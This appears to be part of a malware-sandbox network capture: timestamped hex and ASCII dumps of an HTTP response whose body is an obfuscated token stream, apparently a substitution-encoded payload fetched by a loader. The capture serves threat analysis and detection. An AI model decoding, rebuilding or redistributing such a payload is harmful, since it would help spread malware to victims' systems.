                                                                                                2021-10-26 15:35:12 UTC2917INData Raw: 69 6e 20 53 20 54 54 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 70 20 53 20 54 53 55 20 53 20 70 55 20 53 20 54 54 54 20 53 20 55 6e 20 53 20 55 4d 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 55 20 53 20 69 4f 20 53 20 6e 53 20 53 20 6e 53 20 53 20 6e 67 20 53 20 55 53 20 53 20 70 4f 20 53 20 6e 70 20 53 20 6e 55 20 53 20 69 55 20 53 20 4f 4f 20 53 20 6e 69 20 53 20 6e 67 20 53 20 50 53 20 53 20 6e 53 20 53 20 70 50 20 53 20 55 53 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 4f 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 55 54 20 53 20 70 55 20 53 20 50 70 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 6e 20 53 20 55 50 20 53 20 6e 4f 20 53 20 54 53 67 20 53 20 50 70 20 53 20 70 4f 20 53 20 55 54 20 53 20
                                                                                                Data Ascii: in S TTU S in S in S Up S TSU S pU S TTT S Un S UM S pO S pP S pP S nU S iO S nS S nS S ng S US S pO S np S nU S iU S OO S ni S ng S PS S nS S pP S US S PP S in S in S iO S pn S nU S TSi S UT S pU S Pp S in S in S Pn S Un S UP S nO S TSg S Pp S pO S UT S
                                                                                                2021-10-26 15:35:12 UTC2933INData Raw: 20 6e 53 20 53 20 6e 6e 20 53 20 50 70 20 53 20 70 70 20 53 20 70 50 20 53 20 50 69 20 53 20 54 4d 54 20 53 20 54 53 6e 20 53 20 4f 55 20 53 20 54 54 4f 20 53 20 6e 4f 20 53 20 54 54 50 20 53 20 54 53 55 20 53 20 54 53 67 20 53 20 50 54 20 53 20 54 54 4f 20 53 20 54 53 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 6e 55 20 53 20 69 4f 20 53 20 6e 54 20 53 20 55 4f 20 53 20 54 54 70 20 53 20 70 4f 20 53 20 6e 69 20 53 20 70 50 20 53 20 54 53 67 20 53 20 6e 53 20 53 20 6e 67 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 70 6e 20 53 20 70 70 20 53 20 54 54 4f 20 53 20 55 67 20 53 20 70 50 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 4d 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 70 20 53 20 50 4d
                                                                                                Data Ascii: nS S nn S Pp S pp S pP S Pi S TMT S TSn S OU S TTO S nO S TTP S TSU S TSg S PT S TTO S TSn S pp S pP S nU S iO S nT S UO S TTp S pO S ni S pP S TSg S nS S ng S pP S UT S pP S pP S nS S pn S pp S TTO S Ug S pP S pO S pP S pP S pp S UM S in S TMS S Up S PM
                                                                                                2021-10-26 15:35:12 UTC2949INData Raw: 53 20 54 4d 54 20 53 20 6e 67 20 53 20 70 4f 20 53 20 50 67 20 53 20 55 50 20 53 20 70 4f 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4d 20 53 20 55 50 20 53 20 55 67 20 53 20 70 55 20 53 20 50 50 20 53 20 54 53 53 20 53 20 70 70 20 53 20 6e 54 20 53 20 70 55 20 53 20 69 55 20 53 20 6e 70 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 53 20 53 20 70 70 20 53 20 50 70 20 53 20 50 6e 20 53 20 70 6e 20 53 20 54 54 4f 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4d 20 53 20 55 54 20 53 20 6e 53 20 53 20 54 53 50 20 53 20 55 55 20 53 20 50 54 20 53 20 54 53 6e 20 53 20 50 69 20 53 20 54 4d 54 20 53 20 54 53 54 20 53 20 70 55 20 53 20 54 54 6e 20 53 20 55 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53
                                                                                                Data Ascii: S TMT S ng S pO S Pg S UP S pO S UP S pP S pP S nM S UP S Ug S pU S PP S TSS S pp S nT S pU S iU S np S pP S UT S pP S pP S TSS S pp S Pp S Pn S pn S TTO S ng S pP S pP S nM S UT S nS S TSP S UU S PT S TSn S Pi S TMT S TST S pU S TTn S UO S UT S pP S pP S
                                                                                                2021-10-26 15:35:12 UTC2965INData Raw: 20 53 20 70 50 20 53 20 70 70 20 53 20 55 6e 20 53 20 70 50 20 53 20 70 4f 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 55 50 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 55 50 20 53 20 70 50 20 53 20 70 4f 20 53 20 70 4f 20 53 20 70 50 20 53 20 55 50 20 53 20 54 53 67 20 53 20 70 70 20 53 20 55 50 20 53 20 70 50 20 53 20 70 4f 20 53 20 69 55 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 4f 4f 20 53 20 70 50 20 53 20 55 67 20 53 20 55 54 20 53 20 70 70 20 53 20 6e 4f 20 53 20 70 50 20 53 20 6e 53 20 53 20 6e 6e 20 53 20 70 50 20 53 20 55 50 20 53 20 54 53 67 20 53 20 70 70 20 53 20 55 6e 20 53 20 70 50 20 53 20 70 55 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 70 50 20 53 20 70 70 20
                                                                                                Data Ascii: S pP S pp S Un S pP S pO S TSn S pP S UP S TTO S pp S UP S pP S pO S pO S pP S UP S TSg S pp S UP S pP S pO S iU S pP S pP S pP S pP S pP S pP S nS S OO S pP S Ug S UT S pp S nO S pP S nS S nn S pP S UP S TSg S pp S Un S pP S pU S pP S pP S nO S pP S pp
                                                                                                2021-10-26 15:35:12 UTC2981INData Raw: 50 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 69 20 53 20 55 54 20 53 20 70 50 20 53 20 54 4d 54 20 53 20 70 50 20 53 20 70 6e 20 53 20 50 4d 20 53 20 70 50 20 53 20 6e 6e 20 53 20 54 53 67 20 53 20 70 70 20 53 20 55 4f 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 55 50 20 53 20 70 50 20 53 20 4f 4f 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 6e 20 53 20 54 53 67 20 53 20 70 50 20 53 20 6e 69 20 53 20 55 54 20 53 20 70 70 20 53 20 54 4d 4d 20 53 20 70 50 20 53 20 70 6e 20 53 20
                                                                                                Data Ascii: P S pn S pP S pP S ng S pP S pP S pP S pP S pP S pP S pP S ni S UT S pP S TMT S pP S pn S PM S pP S nn S TSg S pp S UO S pP S pn S pP S pP S pP S pP S pP S pP S pP S pn S UP S pP S OO S TTO S pP S TSg S pP S pn S TSg S pP S ni S UT S pp S TMM S pP S pn S
                                                                                                2021-10-26 15:35:12 UTC2997INData Raw: 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 55 4d 20 53 20 55 54 20 53 20 70 70 20 53 20 70 4f 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 67 20 53 20 70 50 20 53 20 55 53 20 53 20 55 54 20 53 20 70 50 20 53 20 54 53 55 20 53 20 70 50 20 53 20 70 55 20 53 20 54 53 67 20 53 20 70 50 20 53 20 6e 70 20 53 20 54 53 67 20 53 20 70 50 20 53 20 50 4d 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 55 20 53 20 55 54 20 53 20 70 50 20 53 20 6e 50 20 53 20 70 50 20 53 20 70 4f 20 53 20 55 50 20 53 20 70 50 20 53 20 55 50 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 6e 69 20 53 20 70 50 20 53 20 70 55 20 53 20 69 55 20 53 20 70 50 20 53 20 6e 69 20 53 20 55 54 20 53 20 70 50 20 53 20 50 4d 20 53 20 70 50 20 53 20 70 6e 20 53 20 50 4d 20
                                                                                                Data Ascii: pn S pP S pP S UM S UT S pp S pO S pP S nS S TSg S pP S US S UT S pP S TSU S pP S pU S TSg S pP S np S TSg S pP S PM S pP S nS S TSg S pP S pU S UT S pP S nP S pP S pO S UP S pP S UP S TTO S pp S ni S pP S pU S iU S pP S ni S UT S pP S PM S pP S pn S PM
                                                                                                2021-10-26 15:35:12 UTC3013INData Raw: 6e 20 53 20 55 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 50 20 53 20 4f 55 20 53 20 54 53 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 50 69 20 53 20 50 67 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 54 4d 54 20 53 20 54 54 6e 20 53 20 55 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 55 20 53 20 54 4d 4d 20 53 20 54 53 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 54 54 6e 20 53 20 50 67 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 70 55 20 53 20 54 54 53 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 54 54 20 53 20 50 67 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 54 54 6e 20 53
                                                                                                Data Ascii: n S UO S pP S pP S nP S OU S TSO S pP S pP S pn S Pi S Pg S TSg S pP S pP S TMT S TTn S UO S pP S pP S nU S TMM S TSO S pP S pP S pU S TTn S Pg S TSg S pP S pP S pP S nO S OO S pP S pP S pp S pU S TTS S pP S pP S pP S TTT S Pg S TTO S pP S pP S nO S TTn S
                                                                                                2021-10-26 15:35:12 UTC3029INData Raw: 53 20 54 53 53 20 53 20 6e 4d 20 53 20 55 70 20 53 20 54 53 69 20 53 20 4f 55 20 53 20 70 4f 20 53 20 4f 53 20 53 20 54 4d 54 20 53 20 4f 53 20 53 20 55 6e 20 53 20 55 70 20 53 20 6e 53 20 53 20 54 53 54 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 6e 20 53 20 70 50 20 53 20 69 4f 20 53 20 4f 53 20 53 20 54 54 4d 20 53 20 4f 4f 20 53 20 54 54 53 20 53 20 55 4d 20 53 20 69 4f 20 53 20 55 4f 20 53 20 55 6e 20 53 20 54 4d 53 20 53 20 70 70 20 53 20 4f 55 20 53 20 6e 54 20 53 20 54 4d 53 20 53 20 54 54 55 20 53 20 55 4f 20 53 20 69 55 20 53 20 55 70 20 53 20 50 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 54 54 70 20 53 20 70 50 20 53 20 69 4f 20 53 20 54 53 53 20 53 20 54 4d 54 20 53 20 4f 6e 20 53 20 55 55 20 53 20 55 4d 20 53 20 54 53 55 20 53 20
                                                                                                Data Ascii: S TSS S nM S Up S TSi S OU S pO S OS S TMT S OS S Un S Up S nS S TST S pP S pn S pn S pP S iO S OS S TTM S OO S TTS S UM S iO S UO S Un S TMS S pp S OU S nT S TMS S TTU S UO S iU S Up S PM S pP S pP S pn S TTp S pP S iO S TSS S TMT S On S UU S UM S TSU S
                                                                                                2021-10-26 15:35:12 UTC3045INData Raw: 20 54 53 67 20 53 20 54 53 53 20 53 20 50 50 20 53 20 54 53 4d 20 53 20 50 54 20 53 20 6e 67 20 53 20 55 69 20 53 20 6e 70 20 53 20 54 4d 4d 20 53 20 54 53 53 20 53 20 55 55 20 53 20 55 70 20 53 20 54 4d 4d 20 53 20 54 54 50 20 53 20 4f 55 20 53 20 55 55 20 53 20 54 53 70 20 53 20 55 53 20 53 20 55 53 20 53 20 50 67 20 53 20 50 69 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 54 54 70 20 53 20 54 54 69 20 53 20 70 50 20 53 20 69 6e 20 53 20 54 54 50 20 53 20 55 53 20 53 20 6e 69 20 53 20 50 53 20 53 20 54 54 54 20 53 20 54 54 53 20 53 20 54 54 6e 20 53 20 50 53 20 53 20 4f 4f 20 53 20 69 6e 20 53 20 70 50 20 53 20 69 55 20 53 20 50 70 20 53 20 4f 55 20 53 20 55 50 20 53 20 54 4d 53 20 53 20 6e 67 20 53 20 50 69 20 53 20 70 55 20
                                                                                                Data Ascii: TSg S TSS S PP S TSM S PT S ng S Ui S np S TMM S TSS S UU S Up S TMM S TTP S OU S UU S TSp S US S US S Pg S Pi S TTO S pP S pP S in S TTp S TTi S pP S in S TTP S US S ni S PS S TTT S TTS S TTn S PS S OO S in S pP S iU S Pp S OU S UP S TMS S ng S Pi S pU
                                                                                                2021-10-26 15:35:12 UTC3061INData Raw: 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 69 67 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 4d 20 53 20 50 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 69 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4d 20 53 20 69 6e 20 53 20 50 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 69 6e 20 53 20 69 67 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 69 6e 20 53 20 50
                                                                                                Data Ascii: pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pU S ig S pP S pP S pP S pP S in S TSg S pP S pP S pP S TSM S Pp S pP S pP S pP S US S in S pP S pP S pP S nM S in S PM S pP S pP S pp S in S ig S pP S pP S pP S in S in S TSg S pP S pP S US S in S P
                                                                                                2021-10-26 15:35:12 UTC3077INData Raw: 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 54 54 20 53 20 6e 54 20 53 20 69 4f 20 53 20 54 53 67 20 53 20 69 6e 20 53 20 50 6e 20 53 20 54 53 4f 20 53 20 69 4f 20 53 20 69 6e 20 53 20 50 70 20 53 20 4f 6e 20 53 20 55 4d 20 53 20 69 6e 20 53 20 50 70 20 53 20 4f 6e 20 53 20 55 4d 20 53 20 54 54 50 20 53 20 55 55 20 53 20 54 54 70 20 53 20 54 53 4f 20 53 20 69 6e 20 53 20 69 67 20 53 20 4f 55 20 53 20 6e 4f 20 53 20 69 6e 20 53 20 50 70 20 53 20 55 6e 20 53 20 55 54 20 53 20 69 6e 20 53 20 50 70 20 53 20 55 6e 20 53 20 55 54 20 53 20 69 6e 20 53 20 50 70 20 53 20 55 6e 20 53 20 55 54 20 53 20 69 6e 20 53 20 50 70 20 53 20 55 6e 20 53 20 55 54 20 53 20 69 6e 20 53 20 50 70 20
                                                                                                Data Ascii: pP S pP S pP S pP S pP S pP S pP S pP S TTT S nT S iO S TSg S in S Pn S TSO S iO S in S Pp S On S UM S in S Pp S On S UM S TTP S UU S TTp S TSO S in S ig S OU S nO S in S Pp S Un S UT S in S Pp S Un S UT S in S Pp S Un S UT S in S Pp S Un S UT S in S Pp
                                                                                                2021-10-26 15:35:12 UTC3093INData Raw: 20 53 20 50 67 20 53 20 54 53 69 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 54 55 20 53 20 50 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 50 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 4f 55 20 53 20 54 54 70 20 53 20 54 54 53 20 53 20 54 53 4f 20 53 20 55 70 20 53 20 55 4f 20 53 20 54 54 53 20 53 20 54 53 4f 20 53 20 55 70 20 53 20 55 4f 20 53 20 54 54 53 20 53 20 54 53 4f 20 53 20 55 70 20 53 20 55 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50
                                                                                                Data Ascii: S Pg S TSi S TMM S in S in S TTU S PM S in S in S in S in S in S in S in S in S in S in S PP S PP S in S in S OU S TTp S TTS S TSO S Up S UO S TTS S TSO S Up S UO S TTS S TSO S Up S UO S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP
                                                                                                2021-10-26 15:35:12 UTC3109INData Raw: 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 4f 20 53 20 54 53 53 20 53 20 50 50 20 53 20 54 54 4f 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 53 20 53 20 55 6e 20 53 20 50 53 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 70 20 53 20 54 53 67 20 53 20 54 54 4f 20 53 20 70 55 20 53 20 69 6e 20 53 20 55 69 20 53 20 70 6e 20 53 20 69 55 20 53 20 4f 4f 20 53 20 69 6e 20 53 20 6e 54 20 53 20 55 50 20 53 20 54 54 53 20 53 20 6e 55 20 53 20 54 54 55 20 53 20 54 53 53 20 53 20 54 53 50 20 53 20 6e 4d 20 53 20 70 4f 20 53 20 55 53 20 53 20 54 54 4d 20 53 20 70 55 20 53 20 55 54 20 53 20 55 50 20 53 20 6e 4d 20 53 20 54 54 4d 20
                                                                                                Data Ascii: in S in S in S in S in S in S in S in S in S in S in S in S iO S TSS S PP S TTO S in S Pn S US S Un S PS S in S ig S TSp S TSg S TTO S pU S in S Ui S pn S iU S OO S in S nT S UP S TTS S nU S TTU S TSS S TSP S nM S pO S US S TTM S pU S UT S UP S nM S TTM
                                                                                                2021-10-26 15:35:12 UTC3125INData Raw: 20 53 20 70 6e 20 53 20 6e 70 20 53 20 54 53 54 20 53 20 6e 50 20 53 20 54 54 54 20 53 20 54 54 69 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53
                                                                                                Data Ascii: S pn S np S TST S nP S TTT S TTi S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S in S
                                                                                                2021-10-26 15:35:12 UTC3141INData Raw: 20 6e 6e 20 53 20 70 50 20 53 20 4f 53 20 53 20 55 54 20 53 20 70 70 20 53 20 54 54 50 20 53 20 70 50 20 53 20 6e 54 20 53 20 55 50 20 53 20 70 50 20 53 20 55 4f 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 69 55 20 53 20 70 50 20 53 20 6e 54 20 53 20 55 50 20 53 20 70 50 20 53 20 4f 53 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 4f 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 54 53 53 20 53 20 70 50 20 53 20 70 70 20 53 20 54 53 55 20 53 20 70 50 20 53 20 6e 54 20 53 20 69 55 20 53 20 70 50 20 53 20 4f 4f 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 6e 69 20 53 20 70 50 20 53 20 70 4f 20 53 20 6e 6e 20 53 20 70 50 20 53 20 54 53 53 20 53 20 70 50 20 53 20 70 70 20 53 20 54 4d 54 20 53 20 70 50 20 53 20 6e 54 20 53 20 54 54 4f 20 53
                                                                                                Data Ascii: nn S pP S OS S UT S pp S TTP S pP S nT S UP S pP S UO S TTO S pp S iU S pP S nT S UP S pP S OS S pP S pP S TSg S pP S pO S TSn S pP S TSS S pP S pp S TSU S pP S nT S iU S pP S OO S TTO S pP S ni S pP S pO S nn S pP S TSS S pP S pp S TMT S pP S nT S TTO S
                                                                                                2021-10-26 15:35:12 UTC3157INData Raw: 53 20 70 50 20 53 20 6e 54 20 53 20 55 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 70 20 53 20 70 70 20 53 20 70 50 20 53 20 6e 4d 20 53 20 6e 67 20 53 20 70 50 20 53 20 4f 53 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 69 4f 20 53 20 70 50 20 53 20 6e 54 20 53 20 69 55 20 53 20 70 50 20 53 20 4f 53 20 53 20 55 54 20 53 20 70 70 20 53 20 54 54 6e 20 53 20 70 50 20 53 20 6e 4d 20 53 20 55 54 20 53 20 70 50 20 53 20 4f 4f 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 50 69 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20
                                                                                                Data Ascii: S pP S nT S UP S pP S ng S pP S pp S pp S pP S nM S ng S pP S OS S TTO S pp S iO S pP S nT S iU S pP S OS S UT S pp S TTn S pP S nM S UT S pP S OO S TTO S pP S Pi S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S
                                                                                                2021-10-26 15:35:12 UTC3173INData Raw: 4f 55 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 4f 20 53 20 6e 6e 20 53 20 70 50 20 53 20 54 53 53 20 53 20 55 54 20 53 20 70 70 20 53 20 54 4d 54 20 53 20 70 50 20 53 20 6e 4d 20 53 20 6e 67 20 53 20 70 50 20 53 20 4f 53 20 53 20 55 54 20 53 20 70 70 20 53 20 54 54 6e 20 53 20 70 50 20 53 20 6e 4d 20 53 20 55 54 20 53 20 70 50 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 70 20 53 20 6e 53 20 53 20 70 50 20 53 20 6e 54 20 53 20 50 4d 20 53 20 70 50 20 53 20 54 53 53 20 53 20 54 53 67 20 53 20 70 70 20 53 20 54 54 4d 20 53 20 70 50 20 53 20 6e 4d 20 53 20 6e 67 20 53 20 70 50 20 53 20 4f 55 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 54 54 6e 20 53 20 70 50 20 53 20 6e 54 20 53 20 69 55 20 53 20 70 50 20 53 20 4f 53 20 53 20 55
                                                                                                Data Ascii: OU S pP S pP S TSg S pP S pO S nn S pP S TSS S UT S pp S TMT S pP S nM S ng S pP S OS S UT S pp S TTn S pP S nM S UT S pP S ng S pP S pp S nS S pP S nT S PM S pP S TSS S TSg S pp S TTM S pP S nM S ng S pP S OU S TTO S pp S TTn S pP S nT S iU S pP S OS S U
                                                                                                2021-10-26 15:35:12 UTC3189INData Raw: 20 6e 54 20 53 20 55 50 20 53 20 70 50 20 53 20 4f 55 20 53 20 54 53 67 20 53 20 70 70 20 53 20 69 4f 20 53 20 70 50 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 55 50 20 53 20 54 53 67 20 53 20 70 70 20 53 20 54 53 55 20 53 20 70 50 20 53 20 6e 54 20 53 20 69 55 20 53 20 70 50 20 53 20 4f 55 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 50 53 20 53 20 70 50 20 53 20 6e 54 20 53 20 55 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 70 20 53 20 6e 53 20 53 20 70 50 20 53 20 6e 4d 20 53 20 54 53 67 20 53 20 70 50 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 70 20 53 20 54 54 50 20 53 20 70 50 20 53 20 6e 54 20 53 20 50 70 20 53 20 70 50 20 53 20 4f 4f 20 53 20 54 53 67 20 53 20 70 70 20 53 20 54 53 55 20 53 20 70 50 20 53 20 6e 4d 20 53 20 6e
                                                                                                Data Ascii: nT S UP S pP S OU S TSg S pp S iO S pP S pp S UT S pP S UP S TSg S pp S TSU S pP S nT S iU S pP S OU S TTO S pp S PS S pP S nT S UP S pP S ng S pP S pp S nS S pP S nM S TSg S pP S OO S pP S pp S TTP S pP S nT S Pp S pP S OO S TSg S pp S TSU S pP S nM S n
                                                                                                2021-10-26 15:35:12 UTC3205INData Raw: 70 50 20 53 20 6e 54 20 53 20 50 4d 20 53 20 70 50 20 53 20 55 4f 20 53 20 55 54 20 53 20 70 70 20 53 20 54 54 50 20 53 20 70 50 20 53 20 70 4f 20 53 20 50 4d 20 53 20 70 50 20 53 20 55 4f 20 53 20 55 54 20 53 20 70 70 20 53 20 54 54 70 20 53 20 70 50 20 53 20 6e 54 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 70 70 20 53 20 70 50 20 53 20 6e 54 20 53 20 55 54 20 53 20 70 50 20 53 20 54 53 53 20 53 20 54 53 67 20 53 20 70 70 20 53 20 54 53 69 20 53 20 70 50 20 53 20 6e 54 20 53 20 50 4d 20 53 20 70 50 20 53 20 55 4f 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 54 53 55 20 53 20 70 50 20 53 20 6e 54 20 53 20 55 54 20 53 20 70 50 20 53 20 55 50 20 53 20 54 53 67 20 53 20 70 70 20 53 20 69 4f 20 53 20 70 50 20 53 20 6e 54
                                                                                                Data Ascii: pP S nT S PM S pP S UO S UT S pp S TTP S pP S pO S PM S pP S UO S UT S pp S TTp S pP S nT S UP S pP S pP S pP S pp S pp S pP S nT S UT S pP S TSS S TSg S pp S TSi S pP S nT S PM S pP S UO S TTO S pp S TSU S pP S nT S UT S pP S UP S TSg S pp S iO S pP S nT
                                                                                                2021-10-26 15:35:12 UTC3221INData Raw: 20 53 20 54 54 6e 20 53 20 4f 53 20 53 20 55 70 20 53 20 69 4f 20 53 20 54 53 53 20 53 20 6e 70 20 53 20 6e 55 20 53 20 69 4f 20 53 20 70 55 20 53 20 69 67 20 53 20 50 54 20 53 20 54 4d 53 20 53 20 4f 4f 20 53 20 4f 4f 20 53 20 70 6e 20 53 20 54 53 4f 20 53 20 69 4f 20 53 20 6e 6e 20 53 20 6e 4d 20 53 20 54 54 4f 20 53 20 54 53 4f 20 53 20 55 6e 20 53 20 6e 67 20 53 20 50 54 20 53 20 54 53 53 20 53 20 70 70 20 53 20 69 6e 20 53 20 50 67 20 53 20 54 53 50 20 53 20 54 54 50 20 53 20 4f 4f 20 53 20 6e 67 20 53 20 54 53 54 20 53 20 6e 70 20 53 20 54 54 69 20 53 20 55 67 20 53 20 55 50 20 53 20 70 6e 20 53 20 6e 4f 20 53 20 54 53 4d 20 53 20 4f 4f 20 53 20 70 4f 20 53 20 54 53 54 20 53 20 4f 4f 20 53 20 54 53 4d 20 53 20 54 54 67 20 53 20 54 54 6e 20 53 20 4f
                                                                                                Data Ascii: S TTn S OS S Up S iO S TSS S np S nU S iO S pU S ig S PT S TMS S OO S OO S pn S TSO S iO S nn S nM S TTO S TSO S Un S ng S PT S TSS S pp S in S Pg S TSP S TTP S OO S ng S TST S np S TTi S Ug S UP S pn S nO S TSM S OO S pO S TST S OO S TSM S TTg S TTn S O
